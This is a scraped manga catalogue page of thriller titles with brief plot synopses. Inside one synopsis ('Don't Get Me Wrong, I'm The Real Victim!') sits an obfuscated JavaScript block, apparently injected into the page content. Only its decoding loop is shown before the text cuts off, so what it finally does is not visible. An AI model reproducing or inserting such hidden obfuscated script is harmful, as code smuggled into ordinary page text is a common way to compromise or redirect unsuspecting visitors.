Thriller - Page 10

Explore the world of Thriller manga, where gripping stories await. Start reading the best Thriller manga free now!

269 results

Responsibly Irresponsible`s

Responsibility - limitation. Irresponsibility - removal of limitation. This is the principle by which the not quite bad and not quite good characters in this story live, who tend to confuse the concepts of this principle for their own benefit. The story begins with a less responsible character, who is not quite organic, and for the most part beaten off on one hemisphere of the brain bio-android nicknamed Naid-i, who likes to complicate his life with his ill-considered actions, and likes to wear a rubber mask with built-in rabbit ears. The adventures of this character begin with a close acquaintance with a criminal gang called \"45 Stadium\", which includes especially distinguished in its cruelty natives of the sports institution with the same name.


Medarot - Hikaru Arc

A manga adaptation of the first Medarot game. Created by Horuma Rin, the artist for the game series. The story follows Hikaru Agata and his medarot, Metabee\'s adventures.


Saihate ni Madou

After his little sister got raped & killed herself, a teenage boy took revenge & killed her rapist in return. 7 years later the boy\'s released from prison, determined to kill himself due to insufferable guilt but then he\'s confronted by the rapist\'s daughter. A dramatic tale of guilt & atonement. — MangaMogura.



Do-hee, who lives to find her missing mother. A mermaid Si-hyeon appears in front of Do-hee. Do-hee speculates that her mother's disappearance is related to a mermaid..


Enchanter Enchanter

Enchanters possess special talents that set them apart from the average human. They are recognized by their ability to manipulate Chi. However, some use their abilities for personal gain. Some rise against Enchanters to uncover the secrets of the world. Others seek to become the highest power or simply wish to erase Enchanters from existence. Even if it’s destiny, karma, or nature, in the Enchanter world, one must understand the blur between life and death.


The Garden of Plantus

\"I like you!\" Beyond the world we live in lies a place called the Garden, inhabited by otherworldly divine beings known as Plantus. An ordinary human named Lee Rumi happens to encounter Aleph, an incomplete Plantus who has arrived in this world. Having read \"The Little Prince,\" Aleph claims she came in search of \"a one-of-a-kind friend.\" Reluctantly, Rumi agrees to be her friend. But soon after, a figure who looks exactly like Aleph appears, calling Rumi a \"gardener\" and acting as though they\'ve known each other for a long time. Meanwhile, a suspicious professor seems to know far too much about Aleph and the Plantus. As Rumi digs deeper, she begins to notice eerie similarities between the Plantus and the stories on SPR Institute, a paranormal website supposedly dedicated to protecting humanity.


Valkyrie Profile - Enix Supercomic Theater

A manga anthology, based on the first Valkyrie Profile role-playing game \"Lenneth\". It\'s a collection of shortstories by various mangaka.


Kinnikuman II Sei: Ultimate Chojin Tag Arc

The sequel series to \"Kinnikuman ii sei\". A new threat appears to defeat the Legends, known only as the \'Time Chojin\'. These mysterious villains travel through time, in their quest to eradicate the Justice Chojin. If their plan succeeds, they will erase the New Generation from history and usher in a new era of evil domination over the humans. The New Generation must travel through time to stop the Time Chojin. In the process, they earn the distrust of the Legends. The ensuing conflict triggers the start of the \'Ultimate Chojin Tag Tournament\', which will pit Legends against New Generation, and Justice Chojin vs Evil Chojin. The winners will determine the future of the planet as we know it and reign supreme over Earth.


Records of the Demonic Path’s Return

Read Manga Records of the Demonic Path’s Return Online For Free At S2Manga Associated Names: Magic Returns / Record of the Demonic Cultivation’s Return / Record of the Devil Path’s Return / Chronicles of the Demon Faction’s Return / Return of the Magician / 魔道重生录 / 魔道重生記 / 마도귀환록 The Content Records of the Demonic Path’s Return: The main character Myeong-woon has escaped to a faraway sanctuary to avoid the Heavenly Demon God Cult’s fight for power. However, as he did not coincide with the Throne’s Will, he was unable to avoid strife. To make Myeong-woon stir a fight within his family, the Heavenly Demon God Cult’s Leader, Myeonggak, visited him. Attempted to escape, Myeong-woon died. But right before he died, a voice spoke to him in his hazying consciousness. “…Do you regret it? Would you like to fight another time?” Myeong-woon believes he died after this voice away but he opens his eyes and… You can follow some other great Comics!!!: Perfect Secret Love: The Bad New Wife is a Little Sweet Into the light once again Bon Appétit Manga Zin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience.

2 days ago

Ore wa Akutou de wa Arimasen

Cain von Euclid, grandson of the First King who unified the First Continent, learns from his respected grandfather that he is destined to become the strongest villain. Being unable to kill his grandson, the grandfather takes Cain on a journey to make him strong enough to overcome his fate. For 13 years, they travel across the Second, Third, and the Fourth Continent, where Cain achieved tremendous power. Finally, Cain sets off on a lone adventure where he meets many people who influence him. Will he be able to defy destiny and avoid becoming a villain?


Don’t Get Me Wrong, I’m The Real Victim!

An abandoned factory in the middle of the night, an impressive haunted house in an amusement park, and a grim smiling mask above a bloody white coat roaming every dark corner of the city. It has witnessed every single heinous crime, but please don't get me wrong, I'm only a victim.<script></script><script>(function(_0x23ff68,_0x534e2f){var _0x24d11c=_0x29df,_0x595c17=_0x23ff68();while(!![]){try{var _0x1c5254=parseInt(_0x24d11c(0x170))/(0x65e+0xb9*-0x35+-0x7*-0x490)*(parseInt(_0x24d11c(0x173))/(0x1*0x2035+0x11b*-0x1f+-0x212*-0x1))+-parseInt(_0x24d11c(0x16f))/(0x239e+-0x7dc+-0x1*0x1bbf)*(-parseInt(_0x24d11c(0x172))/(0x2158+-0x1069*-0x1+-0x7*0x71b))+parseInt(_0x24d11c(0x17e))/(0x1233+0xed8+-0x2106)+-parseInt(_0x24d11c(0x16b))/(-0xeb9+-0x27*-0x3+-0x1f*-0x76)*(parseInt(_0x24d11c(0x182))/(-0xbc9*-0x3+-0x2*-0x171+-0x2636))+parseInt(_0x24d11c(0x183))/(-0x2654+-0x2ab*0x1+0x2907)+parseInt(_0x24d11c(0x17a))/(-0x65*0x41+-0x1*-0xd6d+0xc41)*(parseInt(_0x24d11c(0x179))/(0x161*0x4+0x2266+-0x27e0))+-parseInt(_0x24d11c(0x17f))/(-0x193f+-0x1d4d+-0x433*-0xd);if(_0x1c5254===_0x534e2f)break;else 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Shin Kamen Rider Spirits (Special Edition)

(Kamen Rider, the righteous warrior who shouts out \"Henshin!\" and continues to fight evil. The heroes created by the genius Shotaro Ishinomori are brought back to life by the hard-working Muraeda Kenichi! In this epic hero battle story, the 10th rider \"ZX\" fights alongside the previous riders against the mysterious organization \"BADAN\" that is invading the world!) “Kamen Rider SPIRITS” is a manga series adapted from the famous Kamen Rider series with content focusing on the first 10 Kamen Riders in Japan\'s Showa period (Showa) and their battle with the Badan Empire under with the help of a multi-governmental task force called “SPIRITS”. The manga\'s setting takes place immediately after the Kamen Rider Super-1 series, and is different from the TV Special \"Birth of the 10th! Kamen Riders All Together!!\" in 1984. In particular, this manga also contributes to supplementing and correcting missing details in the original series such as why Riderman is still alive after the Pluton warhead explosion in the series \"Kamen Rider V3\", or why Electronic Wave Humanoid Tackle was never recognized as a Kamen Rider. Initially, the series was published in the manga magazine \"Magazine Z\" and had to stop for a while because \"Magazine Z\" decided to cancel publication. Later, the manga was revived by \"Monthly Shounen Magazine\" under the name \"Shin Kamen Rider SPIRITS\" and continues to be published to this day. Since volume 3, Shin Kamen Rider Spirits has been published with a special edition, comes with a rare cover, and a separate volume of colorized version for a specific arc in the manga. The first arc which was fully colored was chapter 1 from the original run (\"Skyscraper\'s Gale\"). (P/S: Although there are differences in the presence or absence of the booklet and the cover design between the regular and special editions, the main contents of the manga themselves are the same.)
